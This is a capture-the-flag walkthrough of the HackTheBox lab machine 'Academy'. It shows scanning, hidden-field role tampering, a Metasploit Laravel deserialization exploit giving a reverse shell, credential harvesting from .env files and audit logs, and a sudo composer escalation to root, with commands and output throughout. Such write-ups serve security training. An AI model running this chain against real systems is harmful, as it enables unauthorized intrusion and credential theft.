A walkthrough of the HackTheBox system “Academy”. From the Shellsharks HackTheBox walkthrough series.

Academy

Jump to Section

Reconnaissance

NMAP. Always NMAP.

└─$ sudo nmap -n -sS -sV 10.10.10.215                                                                                                               1 ⨯
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 21:00 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

OK. So NMAP is reporting that the host is down. Well we know the host is there so… Let’s try the -Pn flag…

└─$ sudo nmap -n -sS -sV 10.10.10.215 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 21:00 EST
Nmap scan report for 10.10.10.215
Host is up (0.098s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There we go. Ok, so ports 22 and 80 appear to be listening. I add “10.10.10.215 academy.htb” to /etc/hosts and then head off to the web server… After registering a user and poking around for a bit, I don’t see anything too interesting. Taking a closer look at the registration (/register.php) page source however I see a hidden form field for “roleid”. Let’s take a closer look at this.

<td align="right"><input class="input" size="40" type="password" id="confirm" name="confirm" /></td>
                </tr>
                <input type="hidden" value="0" name="roleid" />
            </table>
            <br/><br/>

Firing up burp, configuring the proxy settings in Firefox and toggling the intercept, I submit a new registration request and change the roleid to “1” instead of “0”. After this, I attempt logging in with this user and… nothing. At first brush, this doesn’t seem to add much functionality. So back to enumeration…

…after some time… Fire up dirb!

dirb was able to find a /admin.php resource.

┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
└─$ dirb http://academy.htb common.txt                                                                                                              1 ⚙

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jan 22 22:05:45 2021
URL_BASE: http://academy.htb/
WORDLIST_FILES: common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://academy.htb/ ----
+ http://academy.htb/admin.php (CODE:200|SIZE:2633)  

Foothold

Alright, so now on this admin.php login page, I use the account I just created which permits me to the “admin” section of the site. Here on this page I see a reference to a “dev-staging-01.academy.htb”. Nice - we’ve got some additional application surface.

<td>Fix issue with dev-staging-01.academy.htb</td>
<td>pending</td>

I add this to my /etc/hosts and whisk myself to this new subdomain. This page has a bunch of strange looking exception logs. Included in the presented log is a bunch of environment variables. Notably, I find a variable with a value “Laravel” and a base-64 encoded “APP_KEY” value.

Environment Variables
APP_NAME 	"Laravel"
...
APP_KEY 	"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="

A little Google-hunting and sure enough, there’s a Metasploit module which seems like it could be relevant! I fire up msf and search for “laravel”. I find the module “unix/http/laravel_token_unserialize_exec”. I set the options of the module as shown below…

  • set APP_KEY to the base64 encoded key you found in the log.
  • set RHOSTS to 10.10.10.215.
  • set VHOST to dev-staging-01.academy.htb.
  • set LHOST to your host.

A li’l exploit -j

msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/http/laravel_token_unserialize_exec) >
[*] Started reverse TCP handler on 10.10.14.17:4444
[*] Command shell session 1 opened (10.10.14.17:4444 -> 10.10.10.215:39562) at 2021-01-22 22:17:03 -0500

Got me a shell session. Let’s drop in…

msf6 exploit(unix/http/laravel_token_unserialize_exec) > sessions -i 1
[*] Starting interaction with 1...

hostname
academy
whoami
www-data

Got me a foothold as www-data.

User

First I upgrade muh shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Some more research on Laravel reveals that some sensitive information is typically stored in .env files. A little hunting on the system and I find a .env in /var/www/html/academy/ which indeed has some interesting stuff.

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

Using these creds for mysql ended up being a no-go, so i tried to use them elsewhere. Taking a look at /etc/passwd I see a bunch of potential users these credentials may possibly work for.

mrb3n:x:1001:1001::/home/mrb3n:/bin/sh
cry0l1t3:x:1002:1002::/home/cry0l1t3:/bin/sh
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
21y4d:x:1003:1003::/home/21y4d:/bin/sh
ch4p:x:1004:1004::/home/ch4p:/bin/sh
g0blin:x:1005:1005::/home/g0blin:/bin/sh

Eventually, I find that the creds do work for user cry0l1t3.

Root

Alright, now as cry0l1t3 let’s do a little Linux privesc enum. LinPEAS is a decent option for this. Grepping through the output of this script for different user names on the system I find some interesting results for mrb3n.

1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>

Alternatively, /var/log/audit/audit.log.3 has some hex encoded data that can be de-encoded to find this same password.

type=TTY msg=audit(1597199290.086:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199304.778:89): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=77686F616D690A
type=TTY msg=audit(1597199308.262:90): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
type=TTY msg=audit(1597199317.622:93): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=2F62696E2F62617368202D690A
type=TTY msg=audit(1597199443.421:94): tty pid=2606 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E18790D
type=TTY msg=audit(1597199533.458:95): tty pid=2643 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=1B5B421B5B411B5B411B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B427F1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E18790D
type=TTY msg=audit(1597199575.087:96): tty pid=2686 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=3618790D
type=TTY msg=audit(1597199606.563:97): tty pid=2537 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=63611B5B411B5B411B5B417F7F636174206175097C206772657020646174613D0D636174206175097C20637574202D663131202D642220220D1B5B411B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B431B5B436772657020646174613D207C200D1B5B41203E202F746D702F646174612E7478740D69640D6364202F746D700D6C730D6E616E6F2064090D636174206409207C207878092D72202D700D6D617F7F7F6E616E6F2064090D6361742064617409207C20787864202D7220700D1B5B411B5B442D0D636174202F7661722F6C6F672F61750974097F7F7F7F7F7F6409617564097C206772657020646174613D0D1B5B411B5B411B5B411B5B411B5B411B5B420D1B5B411B5B411B5B410D1B5B411B5B411B5B410D657869747F7F7F7F686973746F72790D657869740D
type=TTY msg=audit(1597199606.567:98): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
type=TTY msg=audit(1597199610.163:107): tty pid=2709 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=2F62696E2F62617368202D690A
type=TTY msg=audit(1597199616.307:108): tty pid=2712 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=6973746F72790D686973746F72790D657869740D
type=TTY msg=audit(1597199616.307:109): tty pid=2709 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A

Using those creds I can now login as mrb3n. Running sudo -l as this new user I see a binary I can run as super user.

$ sudo -l
sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!

Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Throwing this into Google I see a nice little GTFOBin. Let’s try it out.

$ TF=$(mktemp -d)
TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
sudo composer --working-dir=$TF run-script x
[sudo] password for mrb3n: mrb3n_Ac@d3my!

PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami
whoami
root

YAY! Root.